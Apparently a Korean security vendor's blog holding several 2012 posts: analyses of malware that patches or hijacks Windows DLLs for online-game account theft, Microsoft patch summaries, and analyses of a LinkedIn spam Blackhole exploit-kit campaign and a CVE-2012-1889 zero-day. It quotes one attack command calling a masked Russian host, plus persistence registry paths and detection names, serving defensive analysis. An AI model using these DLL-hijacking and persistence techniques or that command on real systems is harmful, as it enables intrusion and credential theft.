1. DLL 파일에 악의적인 DLL 파일을 로드하는 코드 삽입 후 이 코드로 분기하도록 패치하는 형태


일반적으로 많이 알려진 패치드 형태로서, 과거 3년 전부터 발견되기 시작하였으며, 주로 패치의 대상이 되었던 윈도우 정상 DLL 파일들은 imm32.dll, olepro32.dll, dsound.dll과 같다. 


패치가 된 DLL 파일은 위 이미지와 같이 파일의 섹션 끝 부분에 쉘코드(Shellcode)가 삽입 되어 있다



엔트리포인트(EntryPoint) 변경 후에는 콜 패치(Call Patch) 등의 방법으로 삽입된 코드가 실행이 되면 아래 이미지와 같이 LoadLibraryA가 호출이 되어 악의적인 DLL 파일이 로드 된다.



2. 윈도우 정상 DLL 파일을 악의적인 DLL 파일로 교체 한 뒤, 정상의 Export 함수들을 리다이렉트(Redirect) 시키는 형태

직접적으로 윈도우 정상 DLL 파일을 악의적인 DLL 파일로 교체하는 형태를 이야기 한다. 

이렇게 윈도우 정상 DLL 파일을 감염 시켰을 경우 원래 정상 DLL 파일의 익스포트(Export) 함수들이 정상적으로 호출이 되어야 함으로 익스포트 네임 테이블(Export Name Table)에서 이 함수들로 리다이렉트(Redirect) 시켜 주게 된다.

일반적으로 대상이 되었던 윈도우 정상 DLL 파일들은 ws2help.dll이나 wshtcpip.dll 들이다.


3. AppInit_DLL 레지스트리를 이용한 악의적인 DLL 파일 로드


윈도우 정상 DLL 파일들을 직접적으로 감염 시키는 형태는 아니지만, 온라인 게임 프로세스에 악의적인 DLL을 로드하기 위해 AppInit_DLL 레지스트리를 이용하는 형태이다.


해당 레지스트리에 악의적인 DLL 파일의 파일명을 삽입하게 되면 프로세스가 생성이 될 때, 레지스트리에 있는 존재하는 악의적인 DLL 파일이 로드되는 형태 이다.


4. 온라인 게임 프로세스와 동일 경로에 윈도우 정상 DLL 파일들과 동일한 파일명의 악의적인 DLL 파일 생성


전통적인 DLL 인젝션(Injection) 기법 중 하나로 많이 알려진 형태이며, 2012년 상반기에 발견되기 시작하여 최근 자주 발견되고 있는 온라인 게임 관련 악성코드에서 사용하는 기법이다. 주 대상이 되고 있는 윈동 정상 DLL 파일은  Usp10.dll 을 들 수 있다.

 

온라인 게임 관련 트로이목마 드로퍼(Dropper)가 온라인 게임 프로세스와 같은 경로에 악의적인 usp10.dll 파일을 생성한다. 그 이후 온라인 게임 프로세스가 생성이 될 때 윈도우 시스템 폴더(system32)에 존재하는 정상 usp10.dll 파일 보다 우선 순위가 높은 CurrentPath에 존재하는 악의적인 usp10.dll을 먼저 로드 하게 된다. 그 후 악의적인 usp10.dll 파일이 악의적인 행위를 수행한 뒤에  정상 usp10.dll로 로드하여 정상적인 기능도 제공을 해주는 형태로 동작한다.


5. 리다이렉트(Redirect) 대신 LoadLibrary로 직접 정상 DLL 파일을 로드한 뒤, 해당 익스포트(Export) 함수를 호출하는 형태


각 익스포트(Export) 함수에서 직접 정상 DLL 파일을 로드한 후, GetProcAddress 함수를 이용해 정상 DLL 파일의 익스포트(Export) 함수 주소를 얻은 후 호출하여 정상적인 기능을 제공한다.

이러한 형태로 각각의 익스포트(Expor)t 함수들을 분석을 해보면 아래 이미지와 같이 쉽게 백업된 정상 DLL 파일의 파일명인 ws2helpxp.dll을 확인 할 수 있다.




6. 각각의 익스포트(Export) 함수가 널(Null)로 채워져 있거나, 인코딩(Encoding) 되어 있는 형태

 

정상 DLL 파일명을 확인하기 어려도록 하기 위한 목적으로 각 익스포트(Export) 함수가 아래 이미지와 같이 널(Null)로 채워져 있거나 인코딩(Encoding) 되어 있는 형태들이다.



최근에는 아래 이미지와 같이 문자열을 바로 보여지지 않으려는 시도까지 하고 있다.



앞서 우리는 윈도우 시스템 정상 DLL 파일들을 변조하는 패치드 형태의 악성코드들의 다양한 기법들을 살펴 보았다.


이러한 패치드 형태의 악성코드들이 자주 발견되고 있는 배경으로는 온라인 게임의 사용자 개인 정보를 탈취 하려는 목적과 연관이 되어 있으며, 최근에는 보안 소프트웨어를 무력화하기 위한 목적까지 포함되기 시작하였다.


특히 몇 년전부터 온라인 게임 관련 악성코드들은 유저모드(User Mode)와 커널 모드(Kernel Mode)에 걸쳐 다양한 기법들을 이용해 보안 소프트웨어를 무력화하고자 시도하고 있다. 최근에는 직접적으로 보안 소프트웨어를 공격하기 보다는 좀더 취약하고 방어하기 어려운 윈도우 정상 DLL 파일을 감염시켜 보안 소프트웨어를 무력화 시키고자 시도하고 있다.


이렇게 보안 소프트웨어의 발전과 함께 악성코드 역시 다양한 기법들을 동원하여 진단 및 치료를 어렵게 함과 동시에 직접적으로 보안 소프트웨어를 무력화하기 위한 다양한 기법들을 사용하고 있다. 그러므로 컴퓨터 시스템을 사용하는 개별 사용자가 시스템 관리와 보안에 대한 각별한 관심이 필요하다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

마이크로소프트(Microsoft)에서 2012년 7월 한 달 동안 해당 업체에서 개발한 소프트웨어에서 발견된 보안 취약점들을 제거하기 위해 보안 패치를 2012년 8월 15일 배포하였다.


이번에 마이크로소프트에서 배포된 보안 패치들은 총 9건으로 다음과 같다.


Microsoft Security Bulletin MS12-052 - 긴급

Internet Explorer 누적 보안 업데이트 (2722913)


Microsoft Security Bulletin MS12-053 - 긴급

원격 데스크톱의 취약점으로 인한 원격 코드 실행 문제점 (2723135)


Microsoft Security Bulletin MS12-054 - 긴급

Windows 네트워킹 구성 요소의 취약점으로 인한 원격 코드 실행 문제점 (2733594)


Microsoft Security Bulletin MS12-055 - 중요

Windows 커널 모드 드라이버의 취약점으로 인한 권한 상승 문제점 (2731847)


Microsoft Security Bulletin MS12-056 - 중요

JScript 및 VBScript 엔진의 취약점으로 인한 원격 코드 실행 문제점 (2706045)


Microsoft Security Bulletin MS12-057 - 중요

Microsoft Office의 취약점으로 인한 원격 코드 실행 문제점 (2731879)


Microsoft Security Bulletin MS12-058 - 긴급

Microsoft Exchange Server WebReady 문서 보기가 원격 코드 실행을 허용할 수 있는 취약점 (2740358)


Microsoft Security Bulletin MS12-059 - 중요

Microsoft Visio의 취약점으로 인한 원격 코드 실행 문제점 (2733918)


Microsoft Security Bulletin MS12-060 - 긴급

Windows 공용 컨트롤의 취약점으로 인한 원격 코드 실행 문제점 (2720573)


마이크로소프트의 보안 패치 설치는 인터넷 익스플로러(Internet Explorer) 사용자들의 경우 아래 웹 사이트를 통해 진행 할 수 있다. 


마이크로소프트 업데이트


저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 6월 5일 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴 킷이 스팸 메일(Spam Mail)과 결합되어 유포되었다는 사실을 밝힌 바가 있다.


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 사용자가 많은 유명 소셜 네트워크(Social Network) 서비스인 링크드인(LinkedIn)의 초대 메일로 위장하여 유포되었다.


이 번에 발견된 링크드인 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



링크드인의 초대 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 링크드인 웹 페이지로 연결되는 것이 아니라 중국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 중국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 웹 페이지 하단에는 다른 러시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 아래 이미지와 같이 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 러시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.



해당 블랙홀 웹 익스플로잇 툴킷에 성공적으로 연결하게 되면 웹 브라우저에 의해 CMD 명령으로 윈도우 미디어 플레이(Windows Media Player) 취약점을 악용하기 위한 시도를 하게 된다. 그러나 분석 당시 해당 취약점은 정상적으로 악용되지 않았다.


"C:\Program Files\Windows Media Player\wmplayer.exe" /open http://************.ru:8080/forum/data/hcp_asx.php?f=182b5"


그리고 두 번째로 자바(JAVA)와 인터넷 익스플로러(Internet Explorer)에 존재하는 알려진 취약점을 악용하기 위한 스크립트 파일이 실행된다.



세 번째로 어도비 아크로뱃 리더(Adobe Acrobat Reader)에 존재하는 알려진 취약점을 악용하기 위한 PDF 파일을 아래 이미지와 같이 다운로드 후 실행 하게 된다.



해당 링크드인 스팸 메일을 수신한 PC에 위에서 언급한 4개의 취약점 중 하나라도 존재 할 경우에는 동일한 시스템에서 wpbt0.dll (127,648 바이트)를 다운로드하여 다음 경로에 생성하게 된다.


C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (127,648 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe (127,648 바이트)라를 명칭으로 복사하게 된다.


C:\Documents and Settings\Tester\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\Tester\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 모든 정상 프로세스의 스레드로 자신의 코드 일부분을 삽입한 후 다음의 정보들을 후킹하게 된다.


웹 사이트 접속 정보

FTP 시스템 접속 사용자 계정과 비밀 번호 정보

POP3 이용 프로그램 사용자 계정과 비밀 번호 정보

웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보


감염된 PC에서 수집된 정보들 모두는 아래 이미지와 같이 악성코드 내부에 하드코딩 되어 있는 특정 시스템들으로 후킹한 데이터들 전부를 인코딩하여 전송하게 된다.



그리고 마지막으로 감염된 PC 사용자에게는 아래 웹 페이지와 같이 연결을 시도한 웹 페이지를 보여주어 정상적인 접속이 실패한 것으로 위장하게 된다.



이 번에 발견된 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.


JS/Iframe

Packed/Win32.Krap

PDF/Exploit
JS/Exploit

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.


이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

마이크로소프트(Microsoft)에서 2012년 6월 한 달 동안 해당 업체에서 개발한 소프트웨어에서 발견된 보안 취약점들을 제거하기 위해 보안 패치를 2012년 7월 11일 배포하였다.


이번에 마이크로소프트에서 배포된 보안 패치들은 총 9건으로 다음과 같다.


Microsoft Security Bulletin MS12-043 - 긴급

Microsoft XML Core Services의 취약점으로 인한 원격 코드 실행 문제점 (2722479)


Microsoft Security Bulletin MS12-044 - 긴급

Internet Explorer 누적 보안 업데이트 (2719177)


Microsoft Security Bulletin MS12-045 - 긴급

Microsoft Data Access Components의 취약점으로 인한 원격 코드 실행 문제점 (2698365)


Microsoft Security Bulletin MS12-046 - 중요

Visual Basic for Applications의 취약점으로 인한 원격 코드 실행 문제점 (2707960)


Microsoft Security Bulletin MS12-047 - 중요

Windows 커널 모드 드라이버의 취약점으로 인한 권한 상승 문제점 (2718523)


Microsoft Security Bulletin MS12-048 - 중요

Windows 셸의 취약점으로 인한 원격 코드 실행 문제점 (2691442)


Microsoft Security Bulletin MS12-049 - 중요

TLS의 취약점으로 인한 정보 유출 문제점 (2655992)


Microsoft Security Bulletin MS12-050 - 중요

SharePoint의 취약점으로 인한 권한 상승 문제점 (2695502)


Microsoft Security Bulletin MS12-051 - 중요

Microsoft Office for Mac의 취약점으로 인한 권한 상승 문제점 (2721015)


현재 MS12-043 보안 패치와 관련된 CVE-2012-1889 취약점을 악용한 공격 사례가 지속적으로 발견되고 있음으로 지금 즉시 해당 보안 패치를 설치하는 것이 중요하다.


마이크로소프트의 보안 패치 설치는 인터넷 익스플로러(Internet Explorer) 사용자들의 경우 아래 웹 사이트를 통해 진행 할 수 있다. 


마이크로소프트 업데이트  

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

현지 시각으로 6월 12일 마이크로소프트(Microsoft)에서는 XML 코어 서비스(Core Services)에 알려지지 않은 제로 데이(Zero Day, 0-Day) 취약점이 발견되었음을 보안 권고문 "Microsoft Security Advisory (2719615) Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution"을 통해 공개한 바가 있다.


해당 취약점은 공격자가 지정한 임의 코드를 실행 할 수 있는 코드 실행 취약점이며, 해당 XML 코어 서비스를 사용하는 윈도우(Windows) 운영체제와 오피스(Office) 2003과 2007 버전에서 악용이 가능하다.


해당 취약점은 현재까지도 마이크로소프트에서 보안 패치를 제공하지 않는 제로 데이 취약점이며, 임시 방안으로 해당 취약점을 제거 할 수 있는 픽스 잇(Fix it)을 보안 공지 "Microsoft 보안 공지: Microsoft XML Core Services의 취약성으로 인한 원격 코드 실행 문제"를 통해 배포 중에 있다.


해당 XML 코어 서비스를 악용하는 스크립트 악성코드가 해외에서 발견되는 사례가 서서히 증가하고 있어 주의가 필요하다.


최근 발견된 해당 제로 데이 취약점을 악용하는 스크립트 악성코드는 아래 이미지와 같은 형태의 쉘코드(Shellcode)가 구성되어 있다.



해당 스크립트 악성코드에 포함된 쉘코드가 실행되면 홍콩에 위치한 특정 시스템에서 css.exe (32,936 바이트)를 다운로드 한 후 실행하게 된다.


해당 파일이 실행되면 윈도우 운영체제에서 실행되는 정상 프로세스인 explorer.exe의 스레드로 자신의 코드들을 아래 이미지와 같이 삽입하게 된다



그리고 자신의 코드들이 정상적으로 스레드 인젝션을 하게 되면 구글(Google)의 공개용 DNS 서버로 질의를 송신하여 감염된 시스템이 인터넷에 정상적으로 연결되어 있는지 확인하게 된다.


그 후 싱가포르에 위치한 특정 시스템에 접속을 시도하게 되다, 분석 당시에는 해당 시스템으로 정상적인 접속이 이루어지지 않았다.


해당 악성코드는 감염된 시스템에서 하드웨어 정보, 운영 체제 정보 및 커맨드라인(Command-Line) 명령을 실행하게 된다.


앞 서 언급한 바와 같이 해당 XML 코어 서비스 취약점은 보안 패치가 제공되지 않는 제로 데이 취약점임으로 각별한 주의가 필요하며, 임시 방안으로 마이크로소프트에서 제공하는 픽스 잇을 설치할 수도 있다.


이 번에 발견된 해당 XML 코어 서비스 취약점을 악용하는 악성코드들은 V3 제품 군에서 다음과 같이 진단한다.


JS/Agent 

Win-Trojan/Dekor.32936 


그리고 네트워크 보안장비 트러스가드(TrusGuard) 제품군에서는 다음과 같이 탐지 및 차단이 가능하다.


http_ie_heap_spray_attack-4(HTTP)

ms_xml_core_service_exploit(CVE-2012-1889)


저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원